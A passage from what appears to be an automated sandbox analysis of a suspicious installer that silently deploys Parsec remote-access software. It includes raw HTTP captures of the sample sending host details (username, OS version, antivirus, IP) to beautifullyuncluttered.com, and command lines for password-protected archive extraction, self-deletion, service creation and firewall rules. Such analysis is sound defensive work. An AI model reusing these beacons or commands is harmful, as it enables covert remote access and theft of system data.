                              Nov 14, 2024 03:12:22.235949993 CET1.1.1.1192.168.2.40x8175No error (0)builds.parsec.app104.18.1.181A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • ifconfig.me
                              • beautifullyuncluttered.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.44973334.160.111.1454436880C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              TimestampBytes transferredDirectionData
                              2024-11-14 02:11:52 UTC196OUTGET /ip HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Host: ifconfig.me
                              2024-11-14 02:11:53 UTC227INHTTP/1.1 200 OK
                              date: Thu, 14 Nov 2024 02:11:52 GMT
                              content-type: text/plain
                              Content-Length: 14
                              access-control-allow-origin: *
                              via: 1.1 google
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-11-14 02:11:53 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                              Data Ascii: 173.254.250.91


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449734188.114.97.34436880C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              TimestampBytes transferredDirectionData
                              2024-11-14 02:11:53 UTC255OUTPOST /?CheckApp HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Content-Length: 156
                              Host: beautifullyuncluttered.com
                              2024-11-14 02:11:53 UTC156OUTData Raw: 66 61 30 37 33 64 62 39 36 31 63 64 33 36 34 63 31 66 30 61 64 62 35 63 35 32 66 62 33 64 66 39 0d 0a 31 30 2e 30 30 2e 31 39 30 34 35 0d 0a 59 65 73 0d 0a 59 65 73 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 44 65 66 65 6e 64 65 72 20 41 6e 74 69 76 69 72 75 73 0d 0a 30 36 31 35 34 34 0d 0a 6a 6f 6e 65 73 0d 0a 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 50 53 65 63 57 69 6e 0d 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                              Data Ascii: fa073db961cd364c1f0adb5c52fb3df910.00.19045YesYesMicrosoft Defender Antivirus061544userC:\Users\user\AppData\Roaming\PSecWin173.254.250.91
                              2024-11-14 02:11:54 UTC810INHTTP/1.1 200 OK
                              Date: Thu, 14 Nov 2024 02:11:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Access-Control-Allow-Origin: *
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLohT98Pa1pWF8IqsMkGIkqmZV3wrYu1MortzSxDBTJ%2FfIE3V8ys8kqJlL8Br5Xw5D0OkK1odIfuGIsxLF61u7IR5JL4eXWeCrgHQ5BtmXRS55FxuOvPnDNA1LyJGPmNdnPJbbFJfPUqlE5j8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8e237935bc873acf-DFW
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=1047&delivery_rate=2524847&cwnd=230&unsent_bytes=0&cid=afa7dd2f559a54ef&ts=1010&x=0"
                              2024-11-14 02:11:54 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:21:11:38
                              Start date:13/11/2024
                              Path:C:\Users\user\Desktop\uu8v4UUzTU.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\uu8v4UUzTU.exe"
                              Imagebase:0x400000
                              File size:50'493'432 bytes
                              MD5 hash:2D2F050E6C898065032CB2686A0EFFCA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:21:11:38
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
                              Imagebase:0x400000
                              File size:3'220'480 bytes
                              MD5 hash:828B7D7624C14BE1F3D8122F6E2FAC53
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:21:11:53
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:21:11:53
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                              Imagebase:0x410000
                              File size:557'056 bytes
                              MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:6
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C del "SoundNight.7z"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:12
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              Imagebase:0x400000
                              File size:4'056'240 bytes
                              MD5 hash:01EF58E7C144C701B2EA01CFC049DBE4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:15
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:16
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" control Parsec 200
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:17
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\taskkill.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
                              Imagebase:0xa90000
                              File size:74'240 bytes
                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" stop Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" delete Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:26
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:32
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
                              Imagebase:0x910000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:34
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:36
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:38
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" start Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:39
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:40
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\pservice.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Parsec\pservice.exe"
                              Imagebase:0x7ff7ec020000
                              File size:418'696 bytes
                              MD5 hash:46CD3FC327AF9109BD143BA7F16DF397
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:false

                              General

                              Target ID:41
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:42
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:43
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:44
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:45
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:46
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                              Imagebase:0x400000
                              File size:907'184 bytes
                              MD5 hash:2D009D446A0BA83EC2F12242F7ED126C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:47
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:48
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:49
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                              Imagebase:0x7ff763c00000
                              File size:596'352 bytes
                              MD5 hash:DDDEE00430F7A3D52580B7C85D63D9DC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:50
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
                              Imagebase:0x7ff798a10000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:51
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:52
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:53
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:54
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                              Imagebase:0x7ff6eef20000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:55
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
